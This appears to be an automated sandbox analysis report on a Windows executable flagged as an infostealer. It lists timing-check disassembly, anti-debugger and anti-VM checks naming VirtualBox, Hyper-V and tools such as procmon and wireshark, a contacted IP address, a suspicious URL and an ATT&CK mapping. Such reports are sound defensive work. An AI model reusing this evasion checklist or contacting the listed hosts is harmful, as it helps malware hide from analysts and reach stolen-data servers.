Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 73C069B second address: 73C069F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 73C09CE second address: 73C0A2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push ecx 0x00000007 jmp 00007FAD4CB7BFFAh 0x0000000c mov dword ptr [esp], ebp 0x0000000f pushad 0x00000010 movzx eax, di 0x00000013 pushfd 0x00000014 jmp 00007FAD4CB7C003h 0x00000019 or si, 93DEh 0x0000001e jmp 00007FAD4CB7C009h 0x00000023 popfd 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FAD4CB7BFFDh 0x0000002e rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 73C0A2B second address: 73C0A49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB4B581h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f mov eax, edx 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 73F0037 second address: 73F008A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB7BFFDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FAD4CB7BFFEh 0x0000000f push eax 0x00000010 jmp 00007FAD4CB7BFFBh 0x00000015 xchg eax, ebp 0x00000016 jmp 00007FAD4CB7C006h 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FAD4CB7BFFAh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 73F008A second address: 73F0099 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB4B57Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 73F0099 second address: 73F009E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 73F009E second address: 73F00D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ax, di 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a and esp, FFFFFFF0h 0x0000000d jmp 00007FAD4CB4B587h 0x00000012 sub esp, 44h 0x00000015 pushad 0x00000016 mov si, FFABh 0x0000001a movzx ecx, di 0x0000001d popad 0x0000001e push ecx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 73F00D5 second address: 73F00D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 73F00D9 second address: 73F00DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 73F00DF second address: 73F010B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB7BFFCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FAD4CB7C007h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 73F010B second address: 73F0163 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAD4CB4B57Fh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FAD4CB4B580h 0x00000013 jmp 00007FAD4CB4B585h 0x00000018 popfd 0x00000019 mov edx, ecx 0x0000001b popad 0x0000001c mov dword ptr [esp], esi 0x0000001f jmp 00007FAD4CB4B57Ah 0x00000024 xchg eax, edi 0x00000025 pushad 0x00000026 popad 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 73F0163 second address: 73F0167 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 73F0167 second address: 73F016B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 73F016B second address: 73F0171 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 73F0171 second address: 73F0224 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB4B57Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FAD4CB4B583h 0x00000011 xor si, 612Eh 0x00000016 jmp 00007FAD4CB4B589h 0x0000001b popfd 0x0000001c popad 0x0000001d mov edi, dword ptr [ebp+08h] 0x00000020 pushad 0x00000021 mov ax, D853h 0x00000025 pushfd 0x00000026 jmp 00007FAD4CB4B588h 0x0000002b jmp 00007FAD4CB4B585h 0x00000030 popfd 0x00000031 popad 0x00000032 mov dword ptr [esp+24h], 00000000h 0x0000003a jmp 00007FAD4CB4B57Eh 0x0000003f lock bts dword ptr [edi], 00000000h 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007FAD4CB4B587h 0x0000004b rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 73F0224 second address: 73F022B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 73F022B second address: 73F023E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jc 00007FADBCE8D777h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 73F023E second address: 73F0242 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 73F0242 second address: 73F0248 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 73F0248 second address: 73F024E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 73F024E second address: 73F0252 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 73F0252 second address: 73F0256 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 73F0256 second address: 73F028A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007FAD4CB4B584h 0x00000011 call 00007FAD4CB4B582h 0x00000016 pop esi 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 73F028A second address: 73F02B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB7C000h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a jmp 00007FAD4CB7C000h 0x0000000f pop ebx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 mov di, ax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7420798 second address: 742079D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 742079D second address: 74207F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FAD4CB7C007h 0x00000009 and al, FFFFFFCEh 0x0000000c jmp 00007FAD4CB7C009h 0x00000011 popfd 0x00000012 call 00007FAD4CB7C000h 0x00000017 pop eax 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FAD4CB7BFFDh 0x00000023 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 74109F9 second address: 7410A15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB4B588h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7410A15 second address: 7410A27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAD4CB7BFFEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7410A27 second address: 7410A2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7410A2B second address: 7410A43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a mov esi, 0F9B4A3Fh 0x0000000f popad 0x00000010 mov ebp, esp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7410A43 second address: 7410A47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7410A47 second address: 7410A4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7410A4D second address: 7410A53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7410A53 second address: 7410A57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7410A57 second address: 7410A85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB4B580h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c pushad 0x0000000d call 00007FAD4CB4B57Eh 0x00000012 mov di, si 0x00000015 pop esi 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7410A85 second address: 7410A89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7410A89 second address: 7410A8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7420A19 second address: 7420A3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB7C009h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7420A3D second address: 7420A41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7420A41 second address: 7420A47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7420A47 second address: 7420AA9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB4B582h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov ax, bx 0x0000000e mov eax, ebx 0x00000010 popad 0x00000011 xchg eax, ebp 0x00000012 jmp 00007FAD4CB4B57Fh 0x00000017 mov ebp, esp 0x00000019 jmp 00007FAD4CB4B586h 0x0000001e push dword ptr [ebp+04h] 0x00000021 jmp 00007FAD4CB4B580h 0x00000026 push dword ptr [ebp+0Ch] 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7420AA9 second address: 7420AAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7420AAD second address: 7420AB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7420AB3 second address: 7420AD8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, esi 0x00000005 jmp 00007FAD4CB7BFFEh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push dword ptr [ebp+08h] 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 movsx edi, ax 0x00000016 mov esi, 192C9975h 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7420AD8 second address: 7420ADE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7490A32 second address: 7490A36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7490A36 second address: 7490A53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dl, byte ptr [ebp+14h] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAD4CB4B581h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7490A53 second address: 7490A71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB7C001h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp+10h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7490A71 second address: 7490A77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7490A77 second address: 7490AF0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB7C002h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and dl, 00000007h 0x0000000c pushad 0x0000000d call 00007FAD4CB7BFFEh 0x00000012 pushfd 0x00000013 jmp 00007FAD4CB7C002h 0x00000018 or esi, 1BD82268h 0x0000001e jmp 00007FAD4CB7BFFBh 0x00000023 popfd 0x00000024 pop eax 0x00000025 mov ebx, 5F36DAACh 0x0000002a popad 0x0000002b test eax, eax 0x0000002d pushad 0x0000002e mov ebx, 3627D344h 0x00000033 push ebx 0x00000034 pushad 0x00000035 popad 0x00000036 pop eax 0x00000037 popad 0x00000038 je 00007FADBCE41710h 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007FAD4CB7C000h 0x00000045 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeSpecial instruction interceptor: First address: DA1C65 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeSpecial instruction interceptor: First address: F41B0A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeSpecial instruction interceptor: First address: F4188B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeSpecial instruction interceptor: First address: FCBF48 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_2_008A9980 rdtsc 0_2_008A9980
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_2_006C255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_006C255D
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_2_006C29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_006C29FF
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_2_006C255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_006C255D
Source: xdeRtWCeNH.exe, xdeRtWCeNH.exe, 00000000.00000002.1590510204.0000000000F24000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: xdeRtWCeNH.exe, 00000000.00000003.1453921435.0000000007690000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: xdeRtWCeNH.exe, 00000000.00000003.1480088083.0000000001A41000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4
Source: xdeRtWCeNH.exeBinary or memory string: Hyper-V RAW
Source: xdeRtWCeNH.exe, 00000000.00000003.1453921435.0000000007690000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: xdeRtWCeNH.exe, 00000000.00000003.1482960332.0000000006C91000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlQ=
Source: xdeRtWCeNH.exe, 00000000.00000002.1590510204.0000000000F24000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: xdeRtWCeNH.exe, 00000000.00000003.1569152203.0000000001AAC000.00000004.00000020.00020000.00000000.sdmp, xdeRtWCeNH.exe, 00000000.00000003.1566635388.0000000001AA6000.00000004.00000020.00020000.00000000.sdmp, xdeRtWCeNH.exe, 00000000.00000002.1591781406.0000000001AAF000.00000004.00000020.00020000.00000000.sdmp, xdeRtWCeNH.exe, 00000000.00000003.1569178095.0000000001AAE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeThread information set: HideFromDebuggerJump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeFile opened: NTICE
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeFile opened: SICE
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_2_008A9980 rdtsc 0_2_008A9980
Source: xdeRtWCeNH.exe, xdeRtWCeNH.exe, 00000000.00000002.1590510204.0000000000F24000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: B6Program Manager
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: xdeRtWCeNH.exe, 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, xdeRtWCeNH.exe, 00000000.00000003.1453921435.0000000007690000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: procmon.exe
Source: xdeRtWCeNH.exe, 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, xdeRtWCeNH.exe, 00000000.00000003.1453921435.0000000007690000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: wireshark.exe

Stealing of Sensitive Information

barindex
Infostealer behavior detected
Source: Signature ResultsSignatures: Mutex created, HTTP post and idle behavior
Leaks process information
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 81.29.149.125:80
Source: global trafficTCP traffic: 192.168.2.7:49705 -> 81.29.149.125:80

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		1
Process Injection		23
Virtualization/Sandbox Evasion		OS Credential Dumping751
Security Software Discovery		1
Exploitation of Remote Services		11
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory23
Virtualization/Sandbox Evasion		Remote Desktop Protocol1
Data from Local System		2
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information		Security Account Manager13
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
Obfuscated Files or Information		NTDS1
Remote System Discovery		Distributed Component Object ModelInput Capture4
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
Software Packing		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials216
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
xdeRtWCeNH.exe47%VirustotalBrowse
xdeRtWCeNH.exe100%AviraTR/Crypt.TPM.Gen
xdeRtWCeNH.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF173518686235a10%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

